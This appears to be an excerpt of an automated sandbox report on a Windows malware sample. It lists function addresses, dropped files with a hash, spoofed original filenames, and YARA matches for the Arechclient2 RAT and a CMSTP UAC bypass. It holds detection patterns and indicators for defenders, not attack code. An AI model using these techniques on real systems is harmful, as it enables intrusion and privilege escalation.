Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_0040C7FC	0_2_0040C7FC
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_05BFC6B3	0_2_05BFC6B3
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_05BFF6A8	0_2_05BFF6A8
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_05BFBE87	0_2_05BFBE87
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_05C02607	0_2_05C02607
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_05C0B989	0_2_05C0B989
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_05BF89C8	0_2_05BF89C8
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_05BFC131	0_2_05BFC131
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_05BFC3F8	0_2_05BFC3F8
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_05BFBB15	0_2_05BFBB15
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_05BFCA63	0_2_05BFCA63
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA135A0	1_2_6BA135A0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA1F380	1_2_6BA1F380
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA853C8	1_2_6BA853C8
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA5D320	1_2_6BA5D320
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA2C370	1_2_6BA2C370
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA15340	1_2_6BA15340
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA122A0	1_2_6BA122A0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA44AA0	1_2_6BA44AA0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA2CAB0	1_2_6BA2CAB0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA82AB0	1_2_6BA82AB0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA8BA90	1_2_6BA8BA90
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA31AF0	1_2_6BA31AF0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA5E2F0	1_2_6BA5E2F0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA58AC0	1_2_6BA58AC0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA59A60	1_2_6BA59A60
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA1C9A0	1_2_6BA1C9A0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA4D9B0	1_2_6BA4D9B0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA55190	1_2_6BA55190
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA72990	1_2_6BA72990
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA2D960	1_2_6BA2D960
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA6B970	1_2_6BA6B970
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA8B170	1_2_6BA8B170
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA3A940	1_2_6BA3A940
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA460A0	1_2_6BA460A0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA3C0E0	1_2_6BA3C0E0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA558E0	1_2_6BA558E0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA850C7	1_2_6BA850C7
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA5B820	1_2_6BA5B820
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA64820	1_2_6BA64820
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA27810	1_2_6BA27810
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA5F070	1_2_6BA5F070
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA38850	1_2_6BA38850
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA3D850	1_2_6BA3D850
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA677A0	1_2_6BA677A0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA1DFE0	1_2_6BA1DFE0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA46FF0	1_2_6BA46FF0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA29F00	1_2_6BA29F00
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA57710	1_2_6BA57710
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA74EA0	1_2_6BA74EA0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA7E680	1_2_6BA7E680
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA35E90	1_2_6BA35E90
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA876E3	1_2_6BA876E3
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA1BEF0	1_2_6BA1BEF0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA2FEF0	1_2_6BA2FEF0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA79E30	1_2_6BA79E30
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA65600	1_2_6BA65600
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA57E10	1_2_6BA57E10
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA86E63	1_2_6BA86E63
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA1C670	1_2_6BA1C670
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA34640	1_2_6BA34640
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA62E4E	1_2_6BA62E4E
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA39E50	1_2_6BA39E50
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA53E50	1_2_6BA53E50
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA785F0	1_2_6BA785F0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA50DD0	1_2_6BA50DD0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA2FD00	1_2_6BA2FD00
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA3ED10	1_2_6BA3ED10
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA40512	1_2_6BA40512
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA734A0	1_2_6BA734A0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA7C4A0	1_2_6BA7C4A0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA26C80	1_2_6BA26C80
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA1D4E0	1_2_6BA1D4E0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA56CF0	1_2_6BA56CF0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA264C0	1_2_6BA264C0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA3D4D0	1_2_6BA3D4D0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA8542B	1_2_6BA8542B
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA8AC00	1_2_6BA8AC00
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA55C10	1_2_6BA55C10
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA62C10	1_2_6BA62C10
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA25440	1_2_6BA25440
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA8545C	1_2_6BA8545C
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BAC8BAC	1_2_6BAC8BAC
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB60BA0	1_2_6BB60BA0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BBC6BE0	1_2_6BBC6BE0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB3EA80	1_2_6BB3EA80
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB78A30	1_2_6BB78A30
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB6EA00	1_2_6BB6EA00
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB3CA70	1_2_6BB3CA70
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB809B0	1_2_6BB809B0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB509A0	1_2_6BB509A0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB7A9A0	1_2_6BB7A9A0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BBDC9E0	1_2_6BBDC9E0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BAF49F0	1_2_6BAF49F0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB16900	1_2_6BB16900
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BAF8960	1_2_6BAF8960
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BBC68E0	1_2_6BBC68E0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB10820	1_2_6BB10820
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB4A820	1_2_6BB4A820
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB94840	1_2_6BB94840
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BACEFB0	1_2_6BACEFB0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB9EFF0	1_2_6BB9EFF0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BAC0FE0	1_2_6BAC0FE0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BC08FB0	1_2_6BC08FB0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BAC6F10	1_2_6BAC6F10
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB82F70	1_2_6BB82F70
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BC00F20	1_2_6BC00F20
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB2EF40	1_2_6BB2EF40
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB46E90	1_2_6BB46E90
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BACAEC0	1_2_6BACAEC0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB60EC0	1_2_6BB60EC0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BBA0E20	1_2_6BBA0E20
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB5EE70	1_2_6BB5EE70
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BC4CDC0	1_2_6BC4CDC0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BAC4DB0	1_2_6BAC4DB0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB56D90	1_2_6BB56D90
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB8ED70	1_2_6BB8ED70
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BC48D20	1_2_6BC48D20
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BBEAD50	1_2_6BBEAD50
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB1ECD0	1_2_6BB1ECD0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BABECC0	1_2_6BABECC0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB9AC30	1_2_6BB9AC30
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB86C00	1_2_6BB86C00
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BACAC60	1_2_6BACAC60
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB1E3B0	1_2_6BB1E3B0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BAF23A0	1_2_6BAF23A0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB143E0	1_2_6BB143E0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB32320	1_2_6BB32320
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BC02370	1_2_6BC02370
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB56370	1_2_6BB56370
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BAC2370	1_2_6BAC2370
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BBDC360	1_2_6BBDC360
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BAC8340	1_2_6BAC8340
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BC462C0	1_2_6BC462C0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB8E2B0	1_2_6BB8E2B0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BB922A0	1_2_6BB922A0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BADA2B0	1_2_6BADA2B0
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_0015F840	2_2_0015F840
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_00144060	2_2_00144060
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_00166130	2_2_00166130
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_00142120	2_2_00142120
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_0015B150	2_2_0015B150
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_00199A00	2_2_00199A00
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_0018CAA0	2_2_0018CAA0
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_00154390	2_2_00154390
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_00160390	2_2_00160390
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_0016FC10	2_2_0016FC10
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_00195550	2_2_00195550
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_0014D570	2_2_0014D570
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_0014A6F0	2_2_0014A6F0
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_001666F0	2_2_001666F0
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_001996E0	2_2_001996E0
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_001437B0	2_2_001437B0
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_6C343D16	2_2_6C343D16
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_6C344D8F	2_2_6C344D8F
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_6C35371C	2_2_6C35371C
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_6C2BD24D	2_2_6C2BD24D

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: String function: 6C344701 appears 66 times
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: String function: 6C346320 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: String function: 002C9D36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: String function: 00141900 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: String function: 001414F0 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: String function: 00141310 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: String function: 00141930 appears 76 times
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: String function: 00409CC0 appears 48 times
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: String function: 0042780C appears 43 times
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: String function: 05BF9F27 appears 48 times
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: String function: 05C17A73 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: String function: 6BA4CBE8 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: String function: 6BA594D0 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: String function: 004043B0 appears 316 times

Source: C:\Users\user\Desktop\QPoX60yhZt.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7284 -s 1132

Source: QPoX60yhZt.exe, 00000000.00000003.1771290554.0000000005DDB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1774257100.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1775469000.0000000005DE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1776378047.0000000005DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1772792746.0000000005DE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1776302777.0000000005DBA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1775419214.0000000005DBA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1774359001.0000000005DE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1775503590.0000000005DEB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1774077261.0000000005DC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1771206925.0000000005DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1772572996.0000000005DD6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000002.1996904036.0000000005D68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1771228126.0000000005DD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1771309560.0000000005DE9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1777090076.0000000005DBF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1775553695.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1771406159.0000000005DBF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1771152765.0000000005DBB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000002.1992058029.00000000041FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFirezer( vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.00000000075F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1776584959.0000000005DBA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1775383806.0000000005DD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1774140237.0000000005DED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000000.1635892188.0000000004046000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFirezer( vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1774200501.0000000005DD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1774174644.0000000005DCB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1775343809.0000000005DD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1687520490.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFirezer( vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1776398604.0000000005DC9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1775624744.0000000005DE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.0000000007206000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.0000000007206000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs QPoX60yhZt.exe
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.0000000007206000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \OriginalFileName vs QPoX60yhZt.exe

Source: QPoX60yhZt.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 21.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 21.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 24.2.MSBuild.exe.fa0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 3.2.cmd.exe.5c100c8.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 21.2.cmd.exe.4a3de64.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.run.exe.39e015b.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.cmd.exe.51fc976.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 21.2.cmd.exe.49f9976.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 2.2.run.exe.3fd415b.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.run.exe.399c86d.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.cmd.exe.5240e64.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
